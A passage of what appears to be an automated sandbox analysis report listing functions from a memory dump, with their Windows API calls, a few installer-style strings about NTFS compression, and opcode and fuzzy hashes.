                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MessageSend$Rect$EmptyInvalidateScrollWindow
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 855768636-0
                                                                                                                                                                                                                                  • Opcode ID: a4575d285c62c1c56b7686ad69dfdc5ef60a631fed5d3d1fc0705a1474777ead
                                                                                                                                                                                                                                  • Instruction ID: f7bad605b8f68185b4e834990bb8ca2287257270a928060092b59a923d315d7c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a4575d285c62c1c56b7686ad69dfdc5ef60a631fed5d3d1fc0705a1474777ead
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E5114A71B0030067E650BA7B8C86B5B76C9AB88748F15083FB545EB387DE7DDD094299
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00495924 Relevance: 6.1, APIs: 4, Instructions: 81COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • OffsetRect.USER32(?,?,00000000), ref: 00495988
                                                                                                                                                                                                                                  • OffsetRect.USER32(?,00000000,?), ref: 004959A3
                                                                                                                                                                                                                                  • OffsetRect.USER32(?,?,00000000), ref: 004959BD
                                                                                                                                                                                                                                  • OffsetRect.USER32(?,00000000,?), ref: 004959D8
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: OffsetRect
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 177026234-0
                                                                                                                                                                                                                                  • Opcode ID: e6cd63ab1267e2bef36e0ea42f4f89ffcc49fa5b03609306a0fb63f812f5ac90
                                                                                                                                                                                                                                  • Instruction ID: 9409249b62c1188f54b5b62e2685c04785358b71117f53a2337039625fc08c68
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e6cd63ab1267e2bef36e0ea42f4f89ffcc49fa5b03609306a0fb63f812f5ac90
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1121AEB6700701AFDB00DE69CD81E5BB7DAEFC4350F248A2AF944C3249D638ED048761
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00417218 Relevance: 6.1, APIs: 4, Instructions: 72COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetCursorPos.USER32 ref: 00417260
                                                                                                                                                                                                                                  • SetCursor.USER32(00000000), ref: 004172A3
                                                                                                                                                                                                                                  • GetLastActivePopup.USER32(?), ref: 004172CD
                                                                                                                                                                                                                                  • GetForegroundWindow.USER32(?), ref: 004172D4
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Cursor$ActiveForegroundLastPopupWindow
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1959210111-0
                                                                                                                                                                                                                                  • Opcode ID: 0325eb73ca892009698aa7541b5e3073a06fcfb7bd7d3fb361e05756697ccdec
                                                                                                                                                                                                                                  • Instruction ID: de3f0dc6b436800086b9427ec8ddd2ec86eeedce3a35093462374e80c8eda50e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0325eb73ca892009698aa7541b5e3073a06fcfb7bd7d3fb361e05756697ccdec
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C52183313086118AD720AFA9E945AE733F1EF44754B0544ABF8558B352DB3DDC82CB9E
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004955DC Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • MulDiv.KERNEL32(?,00000008,?), ref: 004955F1
                                                                                                                                                                                                                                  • MulDiv.KERNEL32(?,00000008,?), ref: 00495605
                                                                                                                                                                                                                                  • MulDiv.KERNEL32(?,00000008,?), ref: 00495619
                                                                                                                                                                                                                                  • MulDiv.KERNEL32(?,00000008,?), ref: 00495637
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
                                                                                                                                                                                                                                  • Instruction ID: b77f8f3c6746ea581d036ce488ab013aedd37a602364075716cddbfd1b85439e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A5112E72604504ABCB40DEA9D8C4D9B7BECEF8D324B6441AAF908DB242D674ED408B68
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041F480 Relevance: 6.1, APIs: 4, Instructions: 56registryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetClassInfoA.USER32(00400000,0041F470,?), ref: 0041F4A1
                                                                                                                                                                                                                                  • UnregisterClassA.USER32(0041F470,00400000), ref: 0041F4CA
                                                                                                                                                                                                                                  • RegisterClassA.USER32(00499598), ref: 0041F4D4
                                                                                                                                                                                                                                  • SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 0041F50F
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Class$InfoLongRegisterUnregisterWindow
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4025006896-0
                                                                                                                                                                                                                                  • Opcode ID: 2789f09181fedf2aa8f29be774d1bfe7920984f559ea6f8e8637ed1726722249
                                                                                                                                                                                                                                  • Instruction ID: 7a0dc659497f48f9aad4428a0df7724adcaf244520b53866b591a9b3b5545ee4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2789f09181fedf2aa8f29be774d1bfe7920984f559ea6f8e8637ed1726722249
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F6011B72240104AADA10EBACED81E9B33999729314B11423BB615E72A2D6399C558BAC
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0040D010 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • FindResourceA.KERNEL32(00400000,?,00000000), ref: 0040D027
                                                                                                                                                                                                                                  • LoadResource.KERNEL32(00400000,72756F73,0040A7C8,00400000,00000001,00000000,?,0040CF84,00000000,?,00000000,?,?,0047CB58,0000000A,00000000), ref: 0040D041
                                                                                                                                                                                                                                  • SizeofResource.KERNEL32(00400000,72756F73,00400000,72756F73,0040A7C8,00400000,00000001,00000000,?,0040CF84,00000000,?,00000000,?,?,0047CB58), ref: 0040D05B
                                                                                                                                                                                                                                  • LockResource.KERNEL32(74536563,00000000,00400000,72756F73,00400000,72756F73,0040A7C8,00400000,00000001,00000000,?,0040CF84,00000000,?,00000000,?), ref: 0040D065
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3473537107-0
                                                                                                                                                                                                                                  • Opcode ID: f701ce4f04cb0ebdd1143b5585c75acb70ffd029a82b31343d3be87257736b7b
                                                                                                                                                                                                                                  • Instruction ID: ce77ce8360aa458f47a01e9b0563465317cd85cc21d7bcd45488e041df035c61
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f701ce4f04cb0ebdd1143b5585c75acb70ffd029a82b31343d3be87257736b7b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 49F04F726056046F9B14EE59A881D5B77ECDE88268310013AF908E7286DA38DD018B68
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004705A0 Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 41COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000), ref: 004705F1
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • Failed to set NTFS compression state (%d)., xrefs: 00470602
                                                                                                                                                                                                                                  • Setting NTFS compression on file: %s, xrefs: 004705BF
                                                                                                                                                                                                                                  • Unsetting NTFS compression on file: %s, xrefs: 004705D7
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast
                                                                                                                                                                                                                                  • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on file: %s$Unsetting NTFS compression on file: %s
                                                                                                                                                                                                                                  • API String ID: 1452528299-3038984924
                                                                                                                                                                                                                                  • Opcode ID: 4a85a403c5f553919e8eb8264edf58c674aea38054a880eb2495f4adb197a451
                                                                                                                                                                                                                                  • Instruction ID: 452327faed6fd823952186a677ff1a78a18aba12ee86070aec797b5412e08bdc
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4a85a403c5f553919e8eb8264edf58c674aea38054a880eb2495f4adb197a451
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A5018B71D09248A6CB04D7AD94512DDBBE49F4D314F44C5FFE459D7342DB780A088B9E
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0046FDF4 Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 41COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,00000000), ref: 0046FE45
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • Unsetting NTFS compression on directory: %s, xrefs: 0046FE2B
                                                                                                                                                                                                                                  • Setting NTFS compression on directory: %s, xrefs: 0046FE13
                                                                                                                                                                                                                                  • Failed to set NTFS compression state (%d)., xrefs: 0046FE56
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast
                                                                                                                                                                                                                                  • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on directory: %s$Unsetting NTFS compression on directory: %s
                                                                                                                                                                                                                                  • API String ID: 1452528299-1392080489
                                                                                                                                                                                                                                  • Opcode ID: 01501a136b81c39b7c411191948b84cc59583678e1d21d505a98b8108a1a9e37
                                                                                                                                                                                                                                  • Instruction ID: 6c3eba688a3488f6cff2036d9eec8e6f632fba0cce39d579df3f4bd3b957a0ce
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 01501a136b81c39b7c411191948b84cc59583678e1d21d505a98b8108a1a9e37
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E5014421E0824856CB04D7ADE44129DBBA49F49304F4485BBA495E7253EB790A09879B
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00455D9C Relevance: 6.0, APIs: 4, Instructions: 41registrywindowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                                                                                                                                                  • RegDeleteValueA.ADVAPI32(?,00000000,00000082,00000002,00000000,?,?,00000000,0045B7AE,?,?,?,?,?,00000000,0045B7D5), ref: 00455DD8
                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,?,00000000,00000082,00000002,00000000,?,?,00000000,0045B7AE,?,?,?,?,?,00000000), ref: 00455DE1
                                                                                                                                                                                                                                  • RemoveFontResourceA.GDI32(00000000), ref: 00455DEE
                                                                                                                                                                                                                                  • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 00455E02
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseDeleteFontMessageNotifyOpenRemoveResourceSendValue
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4283692357-0
                                                                                                                                                                                                                                  • Opcode ID: 53be27aa0997865f395f34354d63af882f7726c3d4a8d794711f16c86898bbe7
                                                                                                                                                                                                                                  • Instruction ID: 71ccc6c4ad223293e5fa71c014565a1ca4f3f808124b73c5b0663eb55104ffd2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 53be27aa0997865f395f34354d63af882f7726c3d4a8d794711f16c86898bbe7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 57F0BEB174070036EA10B6BAAC4BF2B26CC8F54745F10883ABA00EF2C3D97CDC04962D
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0047CD48 Relevance: 6.0, APIs: 4, Instructions: 35sleepCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast$CountSleepTick
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2227064392-0
                                                                                                                                                                                                                                  • Opcode ID: e13c2d2b335e86ebcf447858ec8845d31b72a910f84188e90b50ee4c4f03f4e8
                                                                                                                                                                                                                                  • Instruction ID: 56d8cd0ebf6ab4a4d31aad6ab38b951dee0ff9c0bbbb70c30f4e079d31b44593
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e13c2d2b335e86ebcf447858ec8845d31b72a910f84188e90b50ee4c4f03f4e8
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C6E0ED6A30921149863131AE98CA6AF4D48CBC2324B28853FE08CE6283C89C4C0A867E
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00478204 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8,?,?,?,?,?,00498CDB,00000000), ref: 0047820D
                                                                                                                                                                                                                                  • OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8,?,?,?,?,?,00498CDB), ref: 00478213
                                                                                                                                                                                                                                  • GetTokenInformation.ADVAPI32(00000008,00000012(TokenIntegrityLevel),00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8), ref: 00478235
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00000008,TokenIntegrityLevel,00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8), ref: 00478246
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 215268677-0
                                                                                                                                                                                                                                  • Opcode ID: 89672e1c1dad377db11468aaf314ccfc00159a4e206af17bba33db1213e8e157
                                                                                                                                                                                                                                  • Instruction ID: 91f0679cb69370e855683a510bc75a037ced8834772831ea40795c83ba0b1c60
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 89672e1c1dad377db11468aaf314ccfc00159a4e206af17bba33db1213e8e157
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D8F037716447007BD600E6B58C81E5B73DCEB44354F04493E7E98C71C1DA78DC089776
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00424240 Relevance: 6.0, APIs: 4, Instructions: 26windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetLastActivePopup.USER32(?), ref: 0042424C
                                                                                                                                                                                                                                  • IsWindowVisible.USER32(?), ref: 0042425D
                                                                                                                                                                                                                                  • IsWindowEnabled.USER32(?), ref: 00424267
                                                                                                                                                                                                                                  • SetForegroundWindow.USER32(?), ref: 00424271
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Window$ActiveEnabledForegroundLastPopupVisible
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2280970139-0
